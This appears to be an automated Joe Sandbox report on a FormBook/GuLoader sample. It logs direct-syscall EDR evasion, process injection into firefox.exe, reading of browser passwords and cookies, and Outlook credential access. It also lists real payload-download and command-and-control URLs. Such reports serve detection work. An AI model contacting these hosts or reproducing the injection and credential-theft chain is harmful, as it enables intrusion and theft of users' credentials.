Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A383C0 mov eax, dword ptr fs:[00000030h]	15_2_03A383C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A383C0 mov eax, dword ptr fs:[00000030h]	15_2_03A383C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	15_2_03AB63C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	15_2_03ADE3DB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	15_2_03ADE3DB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]	15_2_03ADE3DB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	15_2_03ADE3DB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	15_2_03AD43D4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	15_2_03AD43D4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A6A30B mov eax, dword ptr fs:[00000030h]	15_2_03A6A30B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A6A30B mov eax, dword ptr fs:[00000030h]	15_2_03A6A30B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A6A30B mov eax, dword ptr fs:[00000030h]	15_2_03A6A30B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	15_2_03A2C310
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A50310 mov ecx, dword ptr fs:[00000030h]	15_2_03A50310
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AD437C mov eax, dword ptr fs:[00000030h]	15_2_03AD437C

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: NULL target: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Thread register set: target process: 4044

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Thread APC queued: target process: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe

Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process created: C:\Users\user\Desktop\Zamowienie_522025.exe "C:\Users\user\Desktop\Zamowienie_522025.exe"	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517855429.0000000001910000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1983158265.0000000001911000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000000.2132127387.00000000016A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517855429.0000000001910000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1983158265.0000000001911000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000000.2132127387.00000000016A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517855429.0000000001910000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1983158265.0000000001911000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000000.2132127387.00000000016A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517855429.0000000001910000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1983158265.0000000001911000.00000002.00000001.00040000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000000.2132127387.00000000016A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

5_2_0040338F

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	312 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	312 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	24 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Zamowienie_522025.exe	36%	Virustotal		Browse
Zamowienie_522025.exe	29%	ReversingLabs	Win32.Trojan.Guloader
Zamowienie_522025.exe	100%	Avira	TR/AD.NsisInject.javme

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsw158B.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.frpisealbites.cyou/jlus/?OdQH=z8iiYw+Stw8cg8s0yCOm8FORRNTkmq1qJ2c0oLR1FTZ5MsQo40fD2YfHM+PHDiM3M0h9zAEgo28fhIzZNKCAdTen7c9YY8PKJLnaEMzq/uipFbl8xTPbmSxkYku39afrs4PwL2H3GZ4V&02W=1TxDX6	0%	Avira URL Cloud	safe
https://mastertechnics.co.rs/cvpSZTky111.bin	0%	Avira URL Cloud	safe
https://mastertechnics.co.rs/cvpSZTky111.bin5	0%	Avira URL Cloud	safe
https://mastertechnics.co.rs/cvpSZTky111.bin/	0%	Avira URL Cloud	safe
https://mastertechnics.co.rs/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mastertechnics.co.rs	195.252.110.146	true	false		unknown
www.frpisealbites.cyou	104.21.94.11	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.frpisealbites.cyou/jlus/?OdQH=z8iiYw+Stw8cg8s0yCOm8FORRNTkmq1qJ2c0oLR1FTZ5MsQo40fD2YfHM+PHDiM3M0h9zAEgo28fhIzZNKCAdTen7c9YY8PKJLnaEMzq/uipFbl8xTPbmSxkYku39afrs4PwL2H3GZ4V&02W=1TxDX6	true	Avira URL Cloud: safe	unknown
https://mastertechnics.co.rs/cvpSZTky111.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mastertechnics.co.rs/	Zamowienie_522025.exe, 00000009.00000003.1967330215.0000000002105000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2064924123.0000000002105000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967019226.0000000002105000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mastertechnics.co.rs/cvpSZTky111.bin5	Zamowienie_522025.exe, 00000009.00000002.2064863170.00000000020E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Zamowienie_522025.exe, 00000009.00000001.1403631513.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://duckduckgo.com/ac/?q=	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Zamowienie_522025.exe, 00000009.00000001.1403631513.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Zamowienie_522025.exe	false		high
https://www.ecosia.org/newtab/	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mastertechnics.co.rs/cvpSZTky111.bin/	Zamowienie_522025.exe, 00000009.00000002.2064924123.00000000020EC000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967330215.00000000020EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.94.11	www.frpisealbites.cyou	United States		13335	CLOUDFLARENETUS	false
195.252.110.146	mastertechnics.co.rs	Serbia		6700	BEOTEL-AShttpwwwbeotelnetRS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1630058
Start date and time:	2025-03-05 14:44:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Zamowienie_522025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/17@3/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 85% Number of executed functions: 89 Number of non-executed functions: 235
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.60, 172.202.163.200, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:22:21	API Interceptor	6x Sleep call for process: RMActivate_ssp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.94.11	ORIGINAL SHIPPING DOCS 285380XXX.exe	Get hash	malicious	FormBook	Browse	www.frpisealbites.cyou/iugy/
	Payment Swift Copy 76432650263970239=.exe	Get hash	malicious	FormBook	Browse	www.frpisealbites.cyou/fjko/
	Purchase Inquiry.exe	Get hash	malicious	FormBook	Browse	www.frpisealbites.cyou/fjko/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.frpisealbites.cyou	ORIGINAL SHIPPING DOCS 285380XXX.exe	Get hash	malicious	FormBook	Browse	104.21.94.11
	REQUEST FOR QUOTATION 2025.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	SCAN RC INV 92_0225 SHEETS.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	Payment Swift Copy 76432650263970239=.exe	Get hash	malicious	FormBook	Browse	104.21.94.11
	Purchase Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.94.11
	SOA-EV01025-EV02025.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	#U0130HRACAT FATURASI.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	15300429772_20250121_09114163_HesapOzeti.exe	Get hash	malicious	FormBook	Browse	172.67.217.209

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	FW_ Sam Coon shared _03-04-2025 rabofla_pdf_ with you.msg	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://grzegorztopyla.simvoly.com/?preview=__PREVIEW_ONLY	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://www.creditsafe.com/de/de.html	Get hash	malicious	Unknown	Browse	104.17.25.14
